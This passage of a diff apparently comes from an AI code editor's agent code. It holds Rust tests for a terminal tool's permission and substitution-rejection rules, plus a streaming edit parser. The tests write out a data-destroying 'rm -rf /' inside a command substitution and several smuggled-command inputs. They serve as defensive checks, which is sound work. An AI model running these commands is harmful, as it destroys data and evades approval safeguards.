test_run_hardcoded_denial_still_wins_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(rm -rf /)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("hardcoded denial should override unconditional allow-all"); + assert!( + error.contains("built-in security rule"), + "expected hardcoded denial message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "hardcoded denial should prevent terminal creation" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "hardcoded denial should not request authorization" + ); + } + + #[gpui::test] + async fn test_run_env_prefixed_allow_pattern_is_used_end_to_end(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = 
project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log --oneline".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update for matching env-prefixed allow rule" + ); + + let result = task + .await + .expect("expected env-prefixed command to be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for allowed env-prefixed command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn 
test_run_old_anchored_git_pattern_no_longer_auto_allows_env_prefix( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Confirm), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^git\b", false).unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let _task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=blah git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let _auth = rx.expect_authorization().await; + assert!( + environment.terminal_creation_count() == 0, + "confirm flow should not create terminal before authorization" + ); + } + + #[test] + fn test_terminal_tool_description_mentions_forbidden_substitutions() { + let description = ::description().to_string(); + + assert!( + description.contains("$VAR"), + "missing $VAR example: {description}" + ); + assert!( + description.contains("${VAR}"), + "missing ${{VAR}} example: {description}" 
+ ); + assert!( + description.contains("$(...)"), + "missing $(...) example: {description}" + ); + assert!( + description.contains("backticks"), + "missing backticks example: {description}" + ); + assert!( + description.contains("$((...))"), + "missing $((...)) example: {description}" + ); + assert!( + description.contains("<(...)") && description.contains(">(...)"), + "missing process substitution examples: {description}" + ); + } + + #[test] + fn test_terminal_tool_input_schema_mentions_forbidden_substitutions() { + let schema = ::input_schema( + language_model::LanguageModelToolSchemaFormat::JsonSchema, + ); + let schema_json = serde_json::to_value(schema).expect("schema should serialize"); + let schema_text = schema_json.to_string(); + + assert!( + schema_text.contains("$VAR"), + "missing $VAR example: {schema_text}" + ); + assert!( + schema_text.contains("${VAR}"), + "missing ${{VAR}} example: {schema_text}" + ); + assert!( + schema_text.contains("$(...)"), + "missing $(...) example: {schema_text}" + ); + assert!( + schema_text.contains("backticks"), + "missing backticks example: {schema_text}" + ); + assert!( + schema_text.contains("$((...))"), + "missing $((...)) example: {schema_text}" + ); + assert!( + schema_text.contains("<(...)") && schema_text.contains(">(...)"), + "missing process substitution examples: {schema_text}" + ); + } + + async fn assert_rejected_before_terminal_creation( + command: &str, + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = 
settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: command.to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.unwrap_err(); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "command {command:?} should be rejected with substitution message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "no terminal should be created for rejected command {command:?}" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "rejected command {command:?} should not request authorization" + ); + } + + #[gpui::test] + async fn test_rejects_variable_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ${HOME}", cx).await; + } + + #[gpui::test] + async fn test_rejects_positional_parameter(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $1", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_question(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $?", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_dollar(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $$", cx).await; + } + + #[gpui::test] + async fn test_rejects_special_parameter_at(cx: &mut 
gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $@", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_dollar_parens(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_command_substitution_backticks(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo `whoami`", cx).await; + } + + #[gpui::test] + async fn test_rejects_arithmetic_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $((1 + 1))", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_input(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("cat <(ls)", cx).await; + } + + #[gpui::test] + async fn test_rejects_process_substitution_output(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("ls >(cat)", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_variable(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$HOME git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=$(whoami) git log", cx).await; + } + + #[gpui::test] + async fn test_rejects_env_prefix_with_brace_expansion(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation( + "GIT_SEQUENCE_EDITOR=${EDITOR} git rebase -i HEAD~2", + cx, + ) + .await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_on_second_line(cx: &mut gpui::TestAppContext) { + 
crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo ok\necho $HOME", cx).await; + } + + #[gpui::test] + async fn test_rejects_multiline_with_forbidden_mixed(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("PAGER=less git log\necho $(whoami)", cx).await; + } + + #[gpui::test] + async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await; + } + + #[gpui::test] + async fn test_allow_all_terminal_specific_default_with_empty_patterns( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(whoami)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + 
event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "terminal-specific allow-all should bypass substitution rejection" + ); + + let result = task + .await + .expect("terminal-specific allow-all should let the command proceed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, _rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + 
crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=other git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("different env-var value should not match allow pattern"); + assert!( + error.contains("could not be approved") + || error.contains("denied") + || error.contains("disabled"), + "expected denial for mismatched env value, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for non-matching env value" + ); + } + + #[gpui::test] + async fn test_env_prefix_multiple_assignments_preserved_in_order( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + 
crate::ToolInput::resolved(TerminalToolInput { + command: "A=1 B=2 git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "multi-assignment pattern should match and produce terminal content" + ); + + let result = task + .await + .expect("multi-assignment command matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching multi-assignment command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new( + r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#, + false, + ) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); 
+ + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=\"less -R\" git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "quoted whitespace value should match pattern with quoted form" + ); + + let result = task + .await + .expect("quoted whitespace env value matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching quoted-value command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } } diff --git a/crates/agent/src/tools/tool_edit_parser.rs b/crates/agent/src/tools/tool_edit_parser.rs new file mode 100644 index 0000000000000000000000000000000000000000..86f249ff34eb13b43209331227f624d740ab33af --- /dev/null +++ b/crates/agent/src/tools/tool_edit_parser.rs @@ -0,0 +1,1016 @@ +use smallvec::SmallVec; + +use crate::{Edit, PartialEdit}; + +/// Events emitted by `ToolEditParser` as tool call input streams in. +#[derive(Debug, PartialEq, Eq)] +pub enum ToolEditEvent { + /// A chunk of `old_text` for an edit operation. + OldTextChunk { + edit_index: usize, + chunk: String, + done: bool, + }, + /// A chunk of `new_text` for an edit operation. + NewTextChunk { + edit_index: usize, + chunk: String, + done: bool, + }, + /// A chunk of content for write/overwrite mode. + ContentChunk { chunk: String }, +} + +/// Tracks the streaming state of a single edit to detect deltas. 
+#[derive(Default, Debug)] +struct EditStreamState { + old_text_emitted_len: usize, + old_text_done: bool, + new_text_emitted_len: usize, + new_text_done: bool, +} + +/// Converts incrementally-growing tool call JSON into a stream of chunk events. +/// +/// The tool call streaming infrastructure delivers partial JSON objects where +/// string fields grow over time. This parser compares consecutive partials, +/// computes the deltas, and emits `ToolEditEvent`s that downstream pipeline +/// stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for new_text) +/// can consume incrementally. +/// +/// Because partial JSON comes through a fixer (`partial-json-fixer`) that +/// closes incomplete escape sequences, a string can temporarily contain wrong +/// trailing characters (e.g. a literal `\` instead of `\n`). We handle this +/// by holding back trailing backslash characters in non-finalized chunks: if +/// a partial string ends with `\` (0x5C), that byte is not emitted until the +/// next partial confirms or corrects it. This avoids feeding corrupted bytes +/// to downstream consumers. +#[derive(Default, Debug)] +pub struct ToolEditParser { + edit_states: Vec, + content_emitted_len: usize, +} + +impl ToolEditParser { + /// Push a new set of partial edits (from edit mode) and return any events. + /// + /// Each call should pass the *entire current* edits array as seen in the + /// latest partial input. The parser will diff it against its internal state + /// to produce only the new events. + pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[ToolEditEvent; 4]> { + let mut events = SmallVec::new(); + + for (index, partial) in edits.iter().enumerate() { + if index >= self.edit_states.len() { + // A new edit appeared — finalize the previous one if there was one. 
+ if let Some(previous) = self.finalize_previous_edit(index) { + events.extend(previous); + } + self.edit_states.push(EditStreamState::default()); + } + + let state = &mut self.edit_states[index]; + + // Process old_text changes. + if let Some(old_text) = &partial.old_text + && !state.old_text_done + { + if partial.new_text.is_some() { + // new_text appeared, so old_text is done — emit everything. + let start = state.old_text_emitted_len.min(old_text.len()); + let chunk = normalize_done_chunk(old_text[start..].to_string()); + state.old_text_done = true; + state.old_text_emitted_len = old_text.len(); + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: true, + }); + } else { + let safe_end = safe_emit_end_for_edit_text(old_text); + + if safe_end > state.old_text_emitted_len { + let chunk = old_text[state.old_text_emitted_len..safe_end].to_string(); + state.old_text_emitted_len = safe_end; + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: false, + }); + } + } + } + + // Process new_text changes. + if let Some(new_text) = &partial.new_text + && !state.new_text_done + { + let safe_end = safe_emit_end_for_edit_text(new_text); + + if safe_end > state.new_text_emitted_len { + let chunk = new_text[state.new_text_emitted_len..safe_end].to_string(); + state.new_text_emitted_len = safe_end; + events.push(ToolEditEvent::NewTextChunk { + edit_index: index, + chunk, + done: false, + }); + } + } + } + + events + } + + /// Push new content and return any events. + /// + /// Each call should pass the *entire current* content string. The parser + /// will diff it against its internal state to emit only the new chunk. 
+ pub fn push_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + let mut events = SmallVec::new(); + + let safe_end = safe_emit_end(content); + if safe_end > self.content_emitted_len { + let chunk = content[self.content_emitted_len..safe_end].to_string(); + self.content_emitted_len = safe_end; + events.push(ToolEditEvent::ContentChunk { chunk }); + } + + events + } + + /// Finalize all edits with the complete input. This emits `done: true` + /// events for any in-progress old_text or new_text that hasn't been + /// finalized yet. + /// + /// `final_edits` should be the fully deserialized final edits array. The + /// parser compares against its tracked state and emits any remaining deltas + /// with `done: true`. + pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[ToolEditEvent; 4]> { + let mut events = SmallVec::new(); + + for (index, edit) in edits.iter().enumerate() { + if index >= self.edit_states.len() { + // This edit was never seen in partials — emit it fully. + if let Some(previous) = self.finalize_previous_edit(index) { + events.extend(previous); + } + self.edit_states.push(EditStreamState::default()); + } + + let state = &mut self.edit_states[index]; + + if !state.old_text_done { + let start = state.old_text_emitted_len.min(edit.old_text.len()); + let chunk = normalize_done_chunk(edit.old_text[start..].to_string()); + state.old_text_done = true; + state.old_text_emitted_len = edit.old_text.len(); + events.push(ToolEditEvent::OldTextChunk { + edit_index: index, + chunk, + done: true, + }); + } + + if !state.new_text_done { + let start = state.new_text_emitted_len.min(edit.new_text.len()); + let chunk = normalize_done_chunk(edit.new_text[start..].to_string()); + state.new_text_done = true; + state.new_text_emitted_len = edit.new_text.len(); + events.push(ToolEditEvent::NewTextChunk { + edit_index: index, + chunk, + done: true, + }); + } + } + + events + } + + /// Finalize content with the complete input. 
+ pub fn finalize_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + let mut events = SmallVec::new(); + + let start = self.content_emitted_len.min(content.len()); + if content.len() > start { + let chunk = content[start..].to_string(); + self.content_emitted_len = content.len(); + events.push(ToolEditEvent::ContentChunk { chunk }); + } + + events + } + + /// When a new edit appears at `index`, finalize the edit at `index - 1` + /// by emitting a `NewTextChunk { done: true }` if it hasn't been finalized. + fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { + if new_index == 0 || self.edit_states.is_empty() { + return None; + } + + let previous_index = new_index - 1; + if previous_index >= self.edit_states.len() { + return None; + } + + let state = &mut self.edit_states[previous_index]; + let mut events = SmallVec::new(); + + // If old_text was never finalized, finalize it now with an empty done chunk. + if !state.old_text_done { + state.old_text_done = true; + events.push(ToolEditEvent::OldTextChunk { + edit_index: previous_index, + chunk: String::new(), + done: true, + }); + } + + // Emit a done event for new_text if not already finalized. + if !state.new_text_done { + state.new_text_done = true; + events.push(ToolEditEvent::NewTextChunk { + edit_index: previous_index, + chunk: String::new(), + done: true, + }); + } + + Some(events) + } +} + +/// Returns the byte position up to which it is safe to emit from a partial +/// string. If the string ends with a backslash (`\`, 0x5C), that byte is +/// held back because it may be an artifact of the partial JSON fixer closing +/// an incomplete escape sequence (e.g. turning a half-received `\n` into `\\`). +/// The next partial will reveal the correct character. 
+fn safe_emit_end(text: &str) -> usize { + if text.as_bytes().last() == Some(&b'\\') { + text.len() - 1 + } else { + text.len() + } +} + +fn safe_emit_end_for_edit_text(text: &str) -> usize { + let safe_end = safe_emit_end(text); + if safe_end > 0 && text.as_bytes()[safe_end - 1] == b'\n' { + safe_end - 1 + } else { + safe_end + } +} + +fn normalize_done_chunk(mut chunk: String) -> String { + if chunk.ends_with('\n') { + chunk.pop(); + } + chunk +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_single_edit_streamed_incrementally() { + let mut parser = ToolEditParser::default(); + + // old_text arrives in chunks: "hell" → "hello w" → "hello world" + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hell".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "hell".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello w".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "o w".into(), + done: false, + }] + ); + + // new_text appears → old_text finalizes + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello world".into()), + new_text: Some("good".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "orld".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "good".into(), + done: false, + }, + ] + ); + + // new_text grows + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello world".into()), + new_text: Some("goodbye world".into()), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "bye world".into(), + done: false, + }] + ); + + // Finalize + let events = parser.finalize_edits(&[Edit { + old_text: "hello world".into(), + new_text: "goodbye 
world".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }] + ); + } + + #[test] + fn test_done_chunks_strip_trailing_newline() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[Edit { + old_text: "before\n".into(), + new_text: "after\n".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "before".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "after".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_partial_edit_chunks_hold_back_trailing_newline() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("before\n".into()), + new_text: Some("after\n".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "before".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "after".into(), + done: false, + }, + ] + ); + + let events = parser.finalize_edits(&[Edit { + old_text: "before\n".into(), + new_text: "after\n".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }] + ); + } + + #[test] + fn test_multiple_edits_sequential() { + let mut parser = ToolEditParser::default(); + + // First edit streams in + let events = parser.push_edits(&[PartialEdit { + old_text: Some("first old".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "first old".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("first old".into()), + new_text: Some("first new".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + 
ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "first new".into(), + done: false, + }, + ] + ); + + // Second edit appears → first edit's new_text is finalized + let events = parser.push_edits(&[ + PartialEdit { + old_text: Some("first old".into()), + new_text: Some("first new".into()), + }, + PartialEdit { + old_text: Some("second".into()), + new_text: None, + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: "second".into(), + done: false, + }, + ] + ); + + // Finalize everything + let events = parser.finalize_edits(&[ + Edit { + old_text: "first old".into(), + new_text: "first new".into(), + }, + Edit { + old_text: "second old".into(), + new_text: "second new".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: " old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "second new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_content_streamed_incrementally() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_content("hello"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "hello".into(), + }] + ); + + let events = parser.push_content("hello world"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: " world".into(), + }] + ); + + // No change + let events = parser.push_content("hello world"); + assert!(events.is_empty()); + + let events = parser.push_content("hello world!"); + 